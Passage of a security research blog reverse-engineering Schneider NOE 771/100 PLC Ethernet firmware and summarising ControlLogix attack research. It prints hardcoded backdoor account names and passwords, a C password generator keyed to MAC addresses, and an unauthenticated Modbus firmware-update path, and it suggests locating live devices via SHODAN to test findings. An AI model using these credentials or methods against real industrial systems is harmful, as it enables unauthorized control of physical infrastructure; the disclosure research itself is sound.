Reverse Mode

Reversemode

News Archive

Sunday, 19 May 2013

CONTENT

BYTES & WORDS

Show latest blog entries

Project Basecamp - Attacking ControlLogix
(Thursday, 19 January 2012) Written by Rubén
You can download my contribution to the Digitalbond's project basecamp by clicking on the image. Extracted from the report "One of the most time consuming tasks I came across during this research was reading all the technical documentation gathered. Initially this fact may sound weird but it is nothing unusual at all; while researching into industrial devices, which commonly suffer from a lack of strong security measures implemented by design, the hardest part is not learning how to break things but understanding how it really works. Therefore, the key point behind attacking this PLC was not how to circumvent its security but monitoring how the legitimate software performed valid operations in order to mimic them, in addition to the usual dose of reverse engineering and fuzzing to discover the ‘secrets’ behind the scenes. To sum up, any legit functionality supported by the controller could also be used by a malicious user in a malicious manner. During this ‘journey’ we have identified problems that can be used to cause a DoS, load a trojanized firmware or leak information. Actually it’s not a bug, it’s a feature." I'd say the underlying problem is that some of these 'attacks' are actually features documented in the CIP protocol, so again "any legit functionality supported by the controller could also be used by a malicious user".Within this context, the following article worths a read DHS Thinks Some SCADA Problems Are Too Big To Call "Bug" Congrats to Reid and to all the researchers involved as well as thanks to Dale for counting on me for this project. You can watch the following video, showing the results of the "Deep fried controller" exploit.

Reversing Industrial firmware for fun and backdoors I
(Monday, 12 December 2011) Written by Rubén
Update : ICS-CERT alert http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-346-01.pdf Update : Schneider alert http://www.global-download.schneider-electric.com/85257563005C524A/All/0C7358A0825BD0D2C1257966001F1B90?Opendocument Hi Everybody knows I'm commited to hack into the LHC and then blow up the world, my first try was 4 months ago, as you can see below this post, I published “ The power of reading: the CERN case” where I explained the method used to obtain confidential information about the LHC that lead me to 'hack' into the CERN (not really). Anyway, if you carefully take a look at the picture that contains some PLCs modules, you'll distinguish their names; one of them was “NOE 771”. So here I go again... “NOE 771” devices are manufactured by Schneider Electrics and “is the latest model in a line of Quantum Ethernet TCP/IP modules designed to make it possible for a Quantum Programmable Logic Controller (PLC) to communicate with devices over an Ethernet network” It sounds good, isn't it? The next logical steps for those poor european independent researchers focused on ICS security are - Search via SHODAN to make sure whether you'll be able to test some of your findings without having to buy the device. - Download the firmware to research into the device without having it physically. Both milestones can be successfully achieved without any problem so now it's time to reverse engineer the firmware! This is what we get after decompressing the main file. Well, obviously the hardcoded credentials present inside the scripts used to update the firmware through ftp are significative. Also this other hardcoded, and well known , account inside '/wwwroot/classes/SAComm.jar' Anyway I was more interested in the firmware so let's take a look at 'wwwroot\conf\exec\NOE7711.bin' As usual, header + ZLIB compressed blob. Once decompressed, the first thing we should do is identifying the processor, there is a cool presentation of Igor Skochinsky which you may find useful during this task. It turns out to be PowerPC. After loading it in ida 6.0 I get this 'sad' scenario. So one more time, common steps to reconstruct a firmware: - Collect info from strings - Fix functions - Rebase - Rebuild symbols if possible First of all, by analizing the strings, we can detect this image as a VxWorks based firmware. Now time to fix the code, don't panic! a simple idc does the magic. Let's take a look at some random prologs of those functions that IDA has already detected. So it seems clear we can use “ 94 21 FF ? ” as a pattern to identify additional functions. After running the script we can see how everything looks totally different. Finding the address to rebase the firmware is a matter of applying certain tricks, during this article we'll see a couple of them. Sometimes the blob where the firmware is embedded contains a header where you can find the base address or maybe it's even a u-boot image. Anyway, this isn't the case but so we have no idea what the base address is, therefore we can use the well-known 'li instructions' trick It seems we have a winner: 0x10000. Once rebased it's time to find the symbols. Commonly. and regardless the type of firmware you're reversing, a method that works pretty well is finding a fixed structure being repeated n times, by inspecting carefully the 'data segment' we can quickly find the symbol table located between 0x00342360 and 0x0036BA60. We'll use the following script to parse it. Ok, we are ready to research into the firmware now that is more human readable. So we can easily follow the VxWorks inicialization procedure, from the default entrypoint 'SymInit'. There is a function specially interesting for us: 'usrRoot' which performs an important part of the initialization, spawning additional tasks as well. telnetInit http://www-kryo.desy.de/documents/vxWorks/V5.4/vxworks/ref/telnetLib.html#telnetInit “The telnet daemon, telnetd( ), accepts remote telnet login requests and causes the shell's input and output to be redirected to the remote user. The telnet daemon is started by calling telnetInit( ), which is called automatically when the configuration macro INCLUDE_TELNET is defined.” However, we still need valid credentials to log in. --SPOILER-- :) There are several hidden accounts allowing remote access via telnet... Commands accepted by this telnet shell (port 23) help Print this list ioHelp Print I/O utilities help info dbgHelp Print debugger help info nfsHelp Print nfs help info netHelp Print network help info spyHelp Print task histogrammer help info timexHelp Print execution timer help info h [n] Print (or set) shell history i [task] Summary of tasks' TCBs ti task Complete info on TCB for task sp adr,args... Spawn a task, pri=100, opt=0, stk=20000 taskSpawn name,pri,opt,stk,adr,args... Spawn a task td task Delete a task ts task Suspend a task tr task Resume a task d [adr[,nunits[,width]]] Display memory m adr[,width] Modify memory mRegs [reg[,task]] Modify a task's registers interactively pc [task] Return task's program counter Type to continue, Q to stop: iam "user"[,"passwd"] Set user name and passwd whoami Print user name devs List devices ld [syms[,noAbort][,"name"]] Load stdin, or file, into memory (syms = add symbols to table: -1 = none, 0 = globals, 1 = all) lkup ["substr"] List symbols in system symbol table lkAddr address List symbol table entries near address checkStack [task] List task stack sizes and usage printErrno value Print the name of a status value period secs,adr,args... Spawn task to call function periodically repeat n,adr,args... Spawn task to call function n times (0=forever) version Print VxWorks version info, and boot l --SPOILER-- usrSecurity This looks like valid credentials, the password is hashed though. You should check out this website to learn how to crack VxWorks passwords http://cvk.posterous.com/how-to-crack-vxworks-password-hashes usrWdbInit The 'infamous' WDB service is active. At this point it's mandatory to recall the research performed by HD Moore on VxWorks, it's really useful to gain a deeper understanding on how the WDB agent and VxWorks hashed passwords can be used as attack vectors. https://community.rapid7.com/community/metasploit/blog/2010/08/02/shiny-old-vxworks-vulnerabilities Credential List #1 → AUT_CSE:cQdd9debez (hashed) usrAppInit This function is a must since it's used by the developers to perform their own initialization so we can assum that contains interesting things. Let's see: ROM:0002A00C bl loginInit ROM:0002A010 addi %r0, %r31, 0x528 ROM:0002A014 lwz %r9, 0x520 (%r31) ROM:0002A018 lbz %r11, 0 (%r9) ROM:0002A01C clrlwi %r9, %r11, 24 ROM:0002A020 lwz %r10, 0x520 (%r31) ROM:0002A024 addi %r11, %r10, 1 ROM:0002A028 lbz %r10, 0 (%r11) ROM:0002A02C clrlwi %r11, %r10, 24 ROM:0002A030 lwz %r8, 0x520 (%r31) ROM:0002A034 addi %r10, %r8, 2 ROM:0002A038 lbz %r8, 0 (%r10) ROM:0002A03C clrlwi %r10, %r8, 24 ROM:0002A040 lwz %r7, 0x520 (%r31) ROM:0002A044 addi %r8, %r7, 3 ROM:0002A048 lbz %r7, 0 (%r8) ROM:0002A04C clrlwi %r8, %r7, 24 ROM:0002A050 lwz %r6, 0x520 (%r31) ROM:0002A054 addi %r7, %r6, 4 ROM:0002A058 lbz %r6, 0 (%r7) ROM:0002A05C clrlwi %r29, %r6, 24 ROM:0002A060 lwz %r6, 0x520 (%r31) ROM:0002A064 addi %r7, %r6, 5 ROM:0002A068 lbz %r6, 0 (%r7) ROM:0002A06C clrlwi %r28, %r6, 24 ROM:0002A070 mr %r3, %r0 ROM:0002A074 lis %r7, ((a_2x_2x_2x_2x_0+ 0x10000 ) @h ) # "%.2X%.2X%.2X%.2X%.2X%.2X" ROM:0002A078 addi %r4, %r7, - 0x56F4 # a_2x_2x_2x_2x_0 ROM:0002A07C mr %r5, %r9 ROM:0002A080 mr %r6, %r11 ROM:0002A084 mr %r7, %r10 ROM:0002A088 mr %r9, %r29 ROM:0002A08C mr %r10, %r28 ROM:0002A090 bl sprintf ROM:0002A094 addi %r0, %r31, 0x528 ROM:0002A098 addi %r9, %r31, 0x538 ROM:0002A09C mr %r3, %r0 ROM:0002A0A0 mr %r4, %r9 ROM:0002A0A4 bl ComputePassword ROM:0002A0A8 addi %r0, %r31, 0x538 ROM:0002A0AC lis %r9, ((aPasswordS+ 0x10000 ) @h ) # "-----> Password: %s <-----\n" ROM:0002A0B0 addi %r3, %r9, - 0x56D8 # aPasswordS ROM:0002A0B4 mr %r4, %r0 ROM:0002A0B8 bl printf ROM:0002A0BC addi %r0, %r31, 0x538 ROM:0002A0C0 mr %r3, %r0 ROM:0002A0C4 lis %r9, unk_374764@h ROM:0002A0C8 addi %r4, %r9, unk_374764@l ROM:0002A0CC bl loginDefaultEncrypt ROM:0002A0D0 lis %r9, ((aFwupgrade+ 0x10000 ) @h ) # "fwupgrade" ROM:0002A0D4 addi %r3, %r9, - 0x56BC # aFwupgrade ROM:0002A0D8 lis %r9, unk_374764@h ROM:0002A0DC addi %r4, %r9, unk_374764@l ROM:0002A0E0 bl loginUserAdd ROM:0002A0E4 lis %r9, ((aSysdiag+ 0x10000 ) @h ) # "sysdiag" ROM:0002A0E8 addi %r3, %r9, - 0x56B0 # aSysdiag ROM:0002A0EC lis %r9, ((aBbddrdzb9+ 0x10000 ) @h ) # "bbddRdzb9" ROM:0002A0F0 addi %r4, %r9, - 0x56A8 # aBbddrdzb9 ROM:0002A0F4 bl loginUserAdd ROM:0002A0F8 lis %r9, ((aNoe77111_v500+ 0x10000 ) @h ) # "noe77111_v500" ROM:0002A0FC addi %r3, %r9, - 0x569C # aNoe77111_v500 ROM:0002A100 lis %r9, ((aRcsyyebczs+ 0x10000 ) @h ) # "RcSyyebczS" ROM:0002A104 addi %r4, %r9, - 0x568C # aRcsyyebczs ROM:0002A108 bl loginUserAdd ROM:0002A10C lis %r9, ((aFdrusers+ 0x10000 ) @h ) # "fdrusers" ROM:0002A110 addi %r3, %r9, - 0x5680 # aFdrusers ROM:0002A114 lis %r9, ((aBrbqyzcy9b+ 0x10000 ) @h ) # "bRbQyzcy9b" ROM:0002A118 addi %r4, %r9, - 0x5674 # aBrbqyzcy9b ROM:0002A11C bl loginUserAdd ROM:0002A120 lis %r9, ((aAutcse+ 0x10000 ) @h ) # "AUTCSE" ROM:0002A124 addi %r3, %r9, - 0x5668 # aAutcse ROM:0002A128 lis %r9, ((aRybqrceesd+ 0x10000 ) @h ) # "RybQRceeSd" ROM:0002A12C addi %r4, %r9, - 0x5660 # aRybqrceesd ROM:0002A130 bl loginUserAdd ROM:0002A134 lis %r9, ((aFtpuser+ 0x10000 ) @h ) # "ftpuser" ROM:0002A138 addi %r3, %r9, - 0x5654 # aFtpuser ROM:0002A13C lis %r9, ((aRcqbrbzryc+ 0x10000 ) @h ) # "RcQbRbzRyc" ROM:0002A140 addi %r4, %r9, - 0x564C # aRcqbrbzryc ROM:0002A144 bl loginUserAdd ROM:0002A148 lis %r9, ((aUser_0+ 0x10000 ) @h ) # "USER" ROM:0002A14C addi %r3, %r9, - 0x5640 # aUser_0 ROM:0002A150 lis %r9, ((aCdcs9bcqc+ 0x10000 ) @h ) # "cdcS9bcQc" ROM:0002A154 addi %r4, %r9, - 0x5638 # aCdcs9bcqc ROM:0002A158 bl loginUserAdd ROM:0002A15C lis %r9, ((aNtpupdate+ 0x10000 ) @h ) # "ntpupdate" ROM:0002A160 addi %r3, %r9, - 0x562C # aNtpupdate ROM:0002A164 lis %r9, ((aSee9cb9y99+ 0x10000 ) @h ) # "See9cb9y99" ROM:0002A168 addi %r4, %r9, - 0x5620 # aSee9cb9y99 ROM:0002A16C bl loginUserAdd ROM:0002A170 bl FTP_User_Add ROM:0002A174 lis %r9, loginUserVerify @h ROM:0002A178 addi %r3, %r9, loginUserVerify @l ROM:0002A17C li %r4, 0 ROM:0002A180 bl ftpdInit Pretty clear, isn't it? It's adding up to 8 hardcoded accounts. Anyway a couple of things deserve more attention. ComputePassword This function generates a password for the user 'fwupgrade' deriving it from the MAC address, which is obtained by ' GetEthAddr '. ROM:00029EEC bl GetEthAddr ROM:00029EF0 mr %r0, %r3 ROM:00029EF4 stw %r0, 0x520 (%r31) ROM:00063E78 ROM:00063E78 # =============== S U B R O U T I N E ======================================= ROM:00063E78 ROM:00063E78 ROM:00063E78 ComputePassword : # CODE XREF: usrAppInit+1D8p ROM:00063E78 # DATA XREF: ROM:003430E8o ROM:00063E78 ROM:00063E78 .set var_28 , - 0x28 ROM:00063E78 .set var_10 , - 0x10 ROM:00063E78 .set var_C , - 0xC ROM:00063E78 .set var_8 , - 8 ROM:00063E78 .set var_4 , - 4 ROM:00063E78 .set arg_4 , 4 ROM:00063E78 ROM:00063E78 stwu %sp, - 0x30 (%sp) ROM:00063E7C mflr %r0 ROM:00063E80 stw %r28, 0x30 + var_10 (%sp) ROM:00063E84 stw %r29, 0x30 + var_C (%sp) ROM:00063E88 stw %r30, 0x30 + var_8 (%sp) ROM:00063E8C stw %r31, 0x30 + var_4 (%sp) ROM:00063E90 stw %r0, 0x30 + arg_4 (%sp) ROM:00063E94 mr %r28, %r3 ROM:00063E98 mr %r29, %r4 ROM:00063E9C mr %r3, %r29 ROM:00063EA0 lis %r4, ((a0x_0+ 0x10000 ) @h ) # "0x" ROM:00063EA4 addi %r4, %r4, - 0x7578 # a0x_0 ROM:00063EA8 bl strcpy ROM:00063EAC mr %r3, %r29 ROM:00063EB0 addi %r4, %r28, 3 ROM:00063EB4 bl strcat ROM:00063EB8 mr %r3, %r29 ROM:00063EBC addi %r4, %sp, 0x30 + var_28 ROM:00063EC0 li %r5, 0x10 ROM:00063EC4 bl strtoul ROM:00063EC8 rotrwi %r5, %r3, 7 ROM:00063ECC xor %r5, %r5, %r3 ROM:00063ED0 mr %r3, %r29 ROM:00063ED4 lis %r4, ((a_8x_0+ 0x10000 ) @h ) # "%.8x" ROM:00063ED8 addi %r4, %r4, - 0x7574 # a_8x_0 ROM:00063EDC rotrwi %r5, %r5, 9 ROM:00063EE0 bl sprintf ROM:00063EE4 lwz %r0, 0x30 + arg_4 (%sp) ROM:00063EE8 mtlr %r0 ROM:00063EEC lwz %r28, 0x30 + var_10 (%sp) ROM:00063EF0 lwz %r29, 0x30 + var_C (%sp) ROM:00063EF4 lwz %r30, 0x30 + var_8 (%sp) ROM:00063EF8 lwz %r31, 0x30 + var_4 (%sp) ROM:00063EFC addi %sp, %sp, 0x30 ROM:00063F00 blr ROM:00063F00 # End of function ComputePassword ROM:00063F00 In C would be something like this : /* Schneider NOE 771 fwupgrade pass generator / / Based on device's ethernet address / / Ruben Santamarta @reversemode / #define ROTR32(x,n) ( ((x) > > (n)) \| ((x) < < (32 - (n))) ) int main (int argc, char argv[]) { unsigned int a1,a2; unsigned int pass; if(argc != 2 ) { printf("usage: pass_gen 0xMAC\n"); exit(0); } a1 = strtoul(argv[1],NULL,16); a2 = ROTR32(a1,7); a2 ^= a1; pass = ROTR32(a2,9); printf("fwupgrade:%.8x\n",pass); } I've not tested this MAC-based password against a real system so if someone can confirm it works please let me know. Moreover, by analizing ' FTP_User_Add ' we can find the hardcoded account we identified previously in the scripts. ROM:0002A730 ROM:0002A730 loc_2A730: # CODE XREF: FTP_User_Add+48j ROM:0002A730 lis %r9, ((aUser_0+ 0x10000 ) @h ) # "USER" ROM:0002A734 addi %r3, %r9, - 0x5640 # aUser_0 ROM:0002A738 lis %r9, ((aDeeczesse+ 0x10000 ) @h ) # "deeczeSSe" ROM:0002A73C addi %r4, %r9, - 0x52F0 # aDeeczesse ROM:0002A740 bl loginUserAdd ROM:0002A744 ROM:0002A744 loc_2A744: # CODE XREF: FTP_User_Add+23Cj ROM:0002A744 lwz %r11, 0x50 + var_50 (%sp) By examining the xrefs to ' taskSpawn ' we can quickly discover more functionalities, including the ' modbus_125_handler ' function which is in charge of updating the firmware via MODBUS 125 function code...we hadn't mentioned yet that this device speaks modbus at port 502. So after all, you don't even need valid credentials to compromise the device. Moreover, this kind of handlers are a great source to discover how the firmware is formatted: headers, checksum etc... Analizying NOE 100 Ethernet Module. NOE 100 is pretty much the same as NOE 771. vxWorks_noe100.bin is the firmware Header + ARM VxWorks image. We're basically following the same previous steps to reconstruct it. In order to promptly find the address to rebase it I came up with this trick, based on jump tables. 1. We search those jump tables with just few and 'tiny' cases ROM:0001A2F4 B locret_1A30C ; jumptable 0001A2F0 default case ROM:0001A2F4 ; --------------------------------------------------------------------------- ROM:0001A2F8 DCD 0x2002A49C ; jump table for switch statement ROM:0001A2F8 DCD 0x2002A4A4 ROM:0001A2F8 DCD 0x2002A494 ROM:0001A2F8 DCD 0x2002A490 ROM:0001A2F8 DCD 0x2002A4A4 ROM:0001A30C ; --------------------------------------------------------------------------- ROM:0001A30C ROM:0001A30C locret_1A30C ; CODE XREF: sub_1A2D4+20j ROM:0001A30C LDMFD SP, {R4,R11,SP,PC} ; jumptable 0001A2F0 default case ROM:0001A30C ; End of function sub_1A2D4 ROM:0001A30C ROM:0001A310 ; --------------------------------------------------------------------------- ROM:0001A310 LDMFD SP, {R4,R11,SP,LR} ROM:0001A314 B sub_19FF8 ROM:0001A318 ; --------------------------------------------------------------------------- ROM:0001A318 LDMFD SP, {R4,R11,SP,LR} ROM:0001A31C B sub_1A1F0 ROM:0001A320 ; --------------------------------------------------------------------------- ROM:0001A320 MOV R1, # 0xE ROM:0001A324 BL sub_158DC ROM:0001A328 MOV R0, R4 ROM:0001A32C BL sub_18EE0 ROM:0001A330 ADD R3, R4, # 0x6B00 ROM:0001A334 ADD R3, R3, # 0x94 ROM:0001A338 LDR R2, [R3,# 8 ] ROM:0001A33C MOV R1, # 0x6B00 ROM:0001A340 CMP R2, # 0 ROM:0001A344 ADD R1, R1, # 0x45 ROM:0001A348 MOVNE R3, # 1 ROM:0001A34C MOV R0, R4 ROM:0001A350 STRNEB R3, [R4,R1] ROM:0001A354 LDMNEFD SP, {R4,R11,SP,PC} ROM:0001A358 BL sub_1A1F0 ROM:0001A35C LDMFD SP, {R4,R11,SP,PC} The jump table is comprised of 5 addresses, then we look carefully the distance between the cases, looking for one distance different from the others, between the 4th and 3rd cases there is a difference of 4 bytes, so taking into account that between the 3rd and 2nd one this difference is greater we can connect the 4th case to its right piece of code. Therefore, in order to find the base address we just have to do a substraction: 0x2002A490 - 0x0001A30C = 0x20010184 is the base address. After reconstructing the symbols (using the same script we used above for the NOE 771 ) we analyze the main functions ROM:2001E190 ROM:2001E190 ; =============== S U B R O U T I N E ======================================= ROM:2001E190 ROM:2001E190 ; Attributes: bp-based frame ROM:2001E190 ROM:2001E190 usrRoot ; DATA XREF: usrKernelInit+B4o ROM:2001E190 ; ROM:off_2001CA24o ROM:2001E190 MOV R12, SP ROM:2001E194 STMFD SP!, {R5,R6,R11,R12,LR,PC} ROM:2001E198 SUB R11, R12, # 4 ROM:2001E19C MOV R5, R0 ROM:2001E1A0 MOV R6, R1 ROM:2001E1A4 BL usrKernelCoreInit ROM:2001E1A8 MOV R2, # 0xBB0 ROM:2001E1AC MOV R1, R6 ROM:2001E1B0 MOV R0, R5 ROM:2001E1B4 BL memInit ROM:2001E1B8 MOV R1, R6 ROM:2001E1BC MOV R0, R5 ROM:2001E1C0 BL memPartLibInit ROM:2001E1C4 BL memInfoInit ROM:2001E1C8 BL usrSysctlInit ROM:2001E1CC MOV R1, R6 ROM:2001E1D0 MOV R0, R5 ROM:2001E1D4 BL usrMmuInit ROM:2001E1D8 BL usrTextProtect ROM:2001E1DC BL edrSystemDebugModeInit ROM:2001E1E0 BL sysClkInit ROM:2001E1E4 BL mathSoftInit ROM:2001E1E8 BL setLibInit ROM:2001E1EC BL usrIosCoreInit ROM:2001E1F0 BL usrKernelExtraInit ROM:2001E1F4 BL usrIosExtraInit ROM:2001E1F8 BL sockLibInit ROM:2001E1FC BL usrNetworkInit ROM:2001E200 BL selTaskDeleteHookAdd ROM:2001E204 BL cplusCtorsLink ROM:2001E208 BL usrCplusLibInit ROM:2001E20C BL cplusDemanglerInit ROM:2001E210 BL usrToolsInit ROM:2001E214 LDMFD SP, {R5,R6,R11,SP,LR} ROM:2001E218 B usrAppInit ROM:2001E218 ; End of function usrRoot ROM:2001E218 usrRoot ROM:2001E164 ROM:2001E164 ; Attributes: bp-based frame ROM:2001E164 ROM:2001E164 usrToolsInit ; CODE XREF: usrRoot+80p ROM:2001E164 MOV R12, SP ROM:2001E168 STMFD SP!, {R11,R12,LR,PC} ROM:2001E16C SUB R11, R12, # 4 ROM:2001E170 BL timexInit ROM:2001E174 BL usrLoaderInit ROM:2001E178 BL usrSymTblInit ROM:2001E17C BL usrWdbInit ROM:2001E180 BL usrWindviewInit ROM:2001E184 BL usrShowInit ROM:2001E188 LDMFD SP, {R11,SP,LR} ROM:2001E18C B usrShellInit ROM:2001E18C ; End of function usrToolsInit ROM:2001E18C WDB is enabled. usrNetworkInit ROM:2001DAE0 ROM:2001DAE0 usrNetAppInit ; CODE XREF: usrNetworkInit+90p ROM:2001DAE0 ROM:2001DAE0 var_14 = - 0x14 ROM:2001DAE0 ROM:2001DAE0 MOV R12, SP ROM:2001DAE4 STMFD SP!, {R4,R11,R12,LR,PC} ROM:2001DAE8 SUB R11, R12, # 4 ROM:2001DAEC SUB SP, SP, # 4 ROM:2001DAF0 BL usrRemoteAccess ROM:2001DAF4 LDR R0, = shellParserControl ROM:2001DAF8 BL telnetdParserSet ROM:2001DAFC CMN R0, # 1 ROM:2001DB00 BEQ loc_2001DBF0 ROM:2001DB04 MOV R0, # 1 ROM:2001DB08 MOV R1, # 0 ROM:2001DB0C BL telnetdInit ROM:2001DB10 CMN R0, # 1 ROM:2001DB14 BEQ loc_2001DBC8 ROM:2001DB18 MOV R0, # 0x17 ROM:2001DB1C BL telnetdStart ROM:2001DB20 CMN R0, # 1 ROM:2001DB24 BEQ loc_2001DBC8 ROM:2001DB28 ROM:2001DB28 loc_2001DB28 ; CODE XREF: usrNetAppInit+F8j ROM:2001DB28 ; usrNetAppInit+120j ROM:2001DB28 BL usrSecurity ROM:2001DB2C MOV R1, # 0 ROM:2001DB30 MOV R0, # 0x2EC0 ROM:2001DB34 MOV R12, # 0xA ROM:2001DB38 ADD R0, R0, # 0x20 ROM:2001DB3C MOV R2, R1 ROM:2001DB40 MOV R3, R1 ROM:2001DB44 STR R12, [SP,# 0x14 + var_14 ] ROM:2001DB48 BL tftpdInit ROM:2001DB4C CMN R0, # 1 ROM:2001DB50 BEQ loc_2001DBDC ROM:2001DB54 LDR R0, = 0x2028C588 ROM:2001DB58 BL strlen ROM:2001DB5C ADD R0, R0, # 1 ROM:2001DB60 BL malloc ROM:2001DB64 SUBS R4, R0, # 0 ROM:2001DB68 BEQ loc_2001DB9C ROM:2001DB6C LDR R1, = 0x2028C588 ROM:2001DB70 BL strcpy ROM:2001DB74 MOV R0, R4 ROM:2001DB78 B loc_2001DB84 ROM:2001DB7C ; --------------------------------------------------------------------------- ROM:2001DB7C ROM:2001DB7C loc_2001DB7C ; CODE XREF: usrNetAppInit+B0j ROM:2001DB7C BL tftpdDirectoryAdd ROM:2001DB80 MOV R0, # 0 ROM:2001DB84 ROM:2001DB84 loc_2001DB84 ; CODE XREF: usrNetAppInit+98j ROM:2001DB84 LDR R1, = 0x2028C594 ROM:2001DB88 BL strtok ROM:2001DB8C CMP R0, # 0 ROM:2001DB90 BNE loc_2001DB7C ROM:2001DB94 MOV R0, R4 ROM:2001DB98 BL free ROM:2001DB9C ROM:2001DB9C loc_2001DB9C ; CODE XREF: usrNetAppInit+88j ROM:2001DB9C ; usrNetAppInit+10Cj ROM:2001DB9C LDR R1, = loginUserVerify ROM:2001DBA0 MOV R2, # 0 ROM:2001DBA4 LDR R0, = 0x2028C598 ROM:2001DBA8 BL ftpd6Init ROM:2001DBAC BL ftpd6EnableSecurity ROM:2001DBB0 BL ftpd6EnableSecurity ROM:2001DBB4 BL usrFtpInit ROM:2001DBB8 BL usrSntpcInit ROM:2001DBBC BL pingLibInit ROM:2001DBC0 LDMFD SP, {R3,R4,R11,SP,LR} ROM:2001DBC4 B usrSnmpCfgInit ROM:2001DBC8 ; --------------------------------------------------------------------------- ROM:2001DBC8 ROM:2001DBC8 loc_2001DBC8 ; CODE XREF: usrNetAppInit+34j ROM:2001DBC8 ; usrNetAppInit+44j ROM:2001DBC8 BL __errno ROM:2001CB3C ROM:2001CB3C usrSecurity ; CODE XREF: usrNetAppInit:loc_2001DB28p ROM:2001CB3C MOV R12, SP ROM:2001CB40 STMFD SP!, {R11,R12,LR,PC} ROM:2001CB44 SUB R11, R12, # 4 ROM:2001CB48 BL loginInit ROM:2001CB4C LDR R1, = 0x2028C2DC ; RcQbRbzRyc ROM:2001CB50 LDR R0, = 0x2028C2E8 ; target ROM:2001CB54 BL loginUserAdd ROM:2001CB58 LDR R3, = 0x2038E774 ROM:2001CB5C LDR R1, [R3] ROM:2001CB60 ANDS R1, R1, # 0x20 ROM:2001CB64 LDR R0, = loginPrompt2 ROM:2001CB68 LDMNEFD SP, {R11,SP,PC} ROM:2001CB6C LDMFD SP, {R11,SP,LR} ROM:2001CB70 B shellLoginInstall ROM:2001CB70 ; End of function usrSecurity ROM:2001CB70 ROM:2001CB70 Another hardcoded credential-> target:RcQbRbzRyc Via XRefs to ' loginUserAdd ' ethernetinit ROM:200701B8 ROM:200701B8 loc_200701B8 ; CODE XREF: ethernetInit+128j ROM:200701B8 LDR R1, = 0x203C572A ROM:200701BC LDR R0, =aTestingpw ; "testingpw" ROM:200701C0 BL loginDefaultEncrypt ROM:200701C4 LDR R1, = 0x203C572A ROM:200701C8 LDR R0, =aTest ; "test" ROM:200701CC BL loginUserAdd ROM:200701D0 LDR R1, = 0x2038DBB8 ROM:200701D4 LDR R0, =aFwdownload ; "fwdownload" ROM:200701D8 BL loginDefaultEncrypt ROM:200701DC LDR R1, = 0x2038DBB8 ROM:200701E0 LDR R0, =aLoader ; "loader" ROM:200701E4 BL loginUserAdd ROM:200701E8 LDR R1, = 0x203948C0 ROM:200701EC LDR R0, =aWebpages ; "webpages" ROM:200701F0 BL loginDefaultEncrypt ROM:200701F4 LDR R1, = 0x203948C0 ROM:200701F8 LDR R0, =aWebserver ; "webserver" ROM:200701FC BL loginUserAdd ROM:20070200 LDR R1, = 0x203C5B78 ROM:20070204 LDR R0, =aFactorycastSch ; "factorycast@schneider" ROM:20070208 BL loginDefaultEncrypt ROM:2007020C LDR R1, = 0x203C5B78 ROM:20070210 LDR R0, =aSysdiag ; "sysdiag" ROM:20070214 BL loginUserAdd ROM:20070218 LDR R1, = 0x2038D4CC ROM:2007021C LDR R0, =aNtpupdate ; "ntpupdate" ROM:20070220 BL loginDefaultEncrypt ROM:20070224 LDR R1, = 0x2038D4CC ROM:20070228 LDR R0, =aNtpupdate ; "ntpupdate" ROM:2007022C BL loginUserAdd ROM:20070230 LDR R1, = 0x2039096C ROM:20070234 LDR R0, =aPcfactory ; "pcfactory" ROM:20070238 BL loginDefaultEncrypt ROM:2007023C LDR R1, = 0x2039096C ROM:20070240 LDR R0, =aPcfactory ; "pcfactory" ROM:20070244 BL loginUserAdd More hardcoded credentials in plain text: USER:USERUSER ROM:200679BC ROM:200679BC ftpAddWebUserPw ; CODE XREF: EthernetManager::initialize(void):loc_20029A10p ROM:200679BC MOV R12, SP ROM:200679C0 STMFD SP!, {R11,R12,LR,PC} ROM:200679C4 LDR R1, = 0x2037CA05 ROM:200679C8 SUB R11, R12, # 4 ROM:200679CC LDR R0, = 0x2037C9B4 ROM:200679D0 BL ftpGetWebUserPw ROM:200679D4 CMN R0, # 1 ROM:200679D8 LDR R1, =(aUseruser+ 4 ) ROM:200679DC LDR R0, = 0x2037C9B4 ROM:200679E0 BEQ loc_20067A00 ROM:200679E4 ROM:200679E4 loc_200679E4 ; CODE XREF: ftpAddWebUserPw+54j ROM:200679E4 LDR R1, = 0x2037CA05 ROM:200679E8 LDR R0, = 0x2037C9B4 ROM:200679EC BL loginUserAdd ROM:200679F0 LDR R0, = 0x2037C9B4 ROM:200679F4 LDR R1, =aSdcaWeb ; "/SDCA/WEB" ROM:200679F8 LDMFD SP, {R11,SP,LR} ROM:200679FC B ftpPathAccessRegister ROM:20067A00 ; --------------------------------------------------------------------------- ROM:20067A00 ROM:20067A00 loc_20067A00 ; CODE XREF: ftpAddWebUserPw+24j ROM:20067A00 BL strcpy ROM:20067A04 LDR R1, = 0x2037CA05 ROM:20067A08 LDR R0, =aUseruser ; "USERUSER" ROM:20067A0C BL loginDefaultEncrypt ROM:20067A10 B loc_200679E4 ROM:20067A10 ; End of function ftpAddWebUserPw ROM:20067A10 ROM:20067A10 ; --------------------------------------------------------------------------- MODBUS 125 dispatcher to ModbusFC125::process125Command handler ROM:20044830 ROM:20044830 ; ModbusFC125::processModbusMessage(MBAPMSG , int ) ROM:20044830 _ZN11ModbusFC12520processModbusMessageEP7MBAPMSGPi ROM:20044830 ; CODE XREF: g_processModbusMessage:loc_200448D8p ROM:20044830 MOV R12, SP ROM:20044834 STMFD SP!, {R4,R5,R11,R12,LR,PC} ROM:20044838 SUB R11, R12, # 4 ROM:2004483C MOV R5, R2 ROM:20044840 MOV R4, R1 ROM:20044844 MOV R3, R1 ROM:20044848 MOV R2, # 1 ROM:2004484C LDRB R12, [R1,# 7 ] ROM:20044850 CMP R12, # 0x7D ; '}' ROM:20044854 BEQ loc_20044884 ROM:20044858 MOV R1, R12 ROM:2004485C BL _ZN11ModbusFC1259MbusErrorEhhP7MBAPMSG ; ModbusFC125::MbusError(uchar,uchar,MBAPMSG ) ROM:20044860 ROM:20044860 loc_20044860 ; CODE XREF: ModbusFC125::processModbusMessage(MBAPMSG ,int )+58j ROM:20044860 ADD R0, R0, # 1 ROM:20044864 AND R3, R0, # 0xFF00 ROM:20044868 MOV R3, R3,ASR#8 ROM:2004486C AND R2, R0, # 0xFF ROM:20044870 ORR R3, R3, R2,LSL#8 ROM:20044874 ADD R1, R0, # 6 ROM:20044878 STRH R3, [R4,# 4 ] ROM:2004487C STR R1, [R5] ROM:20044880 LDMFD SP, {R4,R5,R11,SP,PC} ROM:20044884 ; --------------------------------------------------------------------------- ROM:20044884 ROM:20044884 loc_20044884 ; CODE XREF: ModbusFC125::processModbusMessage(MBAPMSG ,int )+24j 